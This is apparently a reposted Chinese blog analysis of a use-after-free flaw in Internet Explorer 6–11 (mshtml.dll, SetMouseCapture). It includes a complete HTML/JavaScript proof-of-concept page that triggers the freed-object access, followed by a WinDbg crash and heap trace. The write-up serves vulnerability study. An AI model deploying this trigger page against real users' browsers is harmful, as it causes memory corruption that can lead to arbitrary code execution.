Microsoft Internet Explorer 远程代码执行漏洞(CNNVD-201309-304)
Internet Explorer(IE)是美国微软(Microsoft)公司开发的一款Web浏览器,是Windows操作系统附带的默认浏览器。
Microsoft IE 6至11版本中的mshtml.dll文件中的SetMouseCapture功能实现中存在远程代码执行漏洞,该漏洞源于程序访问内存中已被删除或尚未正确分配的对象。攻击者可借助特制的网站并诱使用户查看该网站,利用该漏洞在IE中的当前用户的上下文中执行任意代码,可造成内存损坏。成功利用此漏洞的攻击者可获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
POC如下
<html> <script> function trigger() { Math.tan(3,4); var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); Math.sin(0); document.body.appendChild(id_0); document.body.appendChild(id_1); Math.cos(0); id_1.applyElement(id_0); Math.tan(3,4); id_0.onlosecapture=function(e) { document.write(""); } Math.sin(0); id_0[‘outerText‘]=""; Math.cos(0); id_0.setCapture(); Math.tan(3,4); id_1.setCapture(); Math.sin(0); } window.onload = function() { trigger(); } </script> </html>
程序crash到如下所示的情况,其中edi的值触发了异常。经过分析后发现,edi的值来自于上层函数的传递。并且这个edi的值处于一个已经释放的堆中,调试记录如下所示。
1:021> g (ed4.bd8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=041ce6c8 ecx=05e00680 edx=041ce400 esi=00000000 edi=074a9fb0 eip=656c1f60 esp=041ce618 ebp=041ce620 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CDoc::HasContainerCapture+0x14: 656c1f60 8b0f mov ecx,dword ptr [edi] ds:0023:074a9fb0=???????? 1:021> !heap -p -a edi address 074a9fb0 found in _DPH_HEAP_ROOT @ 1201000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 7392478: 74a9000 2000 6b4890b2 verifier!AVrfDebugPageHeapFree+0x000000c2 771e5674 ntdll!RtlDebugFreeHeap+0x0000002f 771a7aca ntdll!RtlpFreeHeap+0x0000005d 77172d68 ntdll!RtlFreeHeap+0x00000142 75a5f1ac kernel32!HeapFree+0x00000014 656be590 mshtml!CTreeNode::Release+0x0000002d 656d15b1 mshtml!CMarkup::UnloadContents+0x00000380 656d2a8a mshtml!CMarkup::TearDownMarkupHelper+0x00000055 656d2a15 mshtml!CMarkup::TearDownMarkup+0x00000049 655b3b5e mshtml!COmWindowProxy::SwitchMarkup+0x000005a0 65502bb4 mshtml!CDocument::open+0x00000426 65500789 mshtml!CDocument::write+0x0000007c 655b3267 mshtml!Method_void_SAFEARRAYPVARIANTP+0x00000085 656e235c mshtml!CBase::ContextInvokeEx+0x000005dc 656e25d5 mshtml!CBase::InvokeEx+0x00000025 656edf9a mshtml!DispatchInvokeCollection+0x0000014c 656a4998 mshtml!CDocument::InvokeEx+0x000000f0 65693148 mshtml!CBase::VersionedInvokeEx+0x00000020 65693104 mshtml!PlainInvokeEx+0x000000eb 6b4ea22a jscript!IDispatchExInvokeEx2+0x00000104 6b4ea175 jscript!IDispatchExInvokeEx+0x0000006a 6b4ea3f6 jscript!InvokeDispatchEx+0x00000098 6b4ea4a0 jscript!VAR::InvokeByName+0x00000139 6b4fd8c8 jscript!VAR::InvokeDispName+0x0000007d 6b4fd96f jscript!VAR::InvokeByDispID+0x000000ce 6b4fe3e7 jscript!CScriptRuntime::Run+0x00002b80 6b4f5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce 6b4f5bfb jscript!ScrFncObj::Call+0x0000008d 6b4f5e11 jscript!CSession::Execute+0x0000015f 6b4ef3ee jscript!NameTbl::InvokeDef+0x000001b5 6b4eea2e jscript!NameTbl::InvokeEx+0x0000012c 65707af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1
原文:http://www.cnblogs.com/Ox9A82/p/5797123.html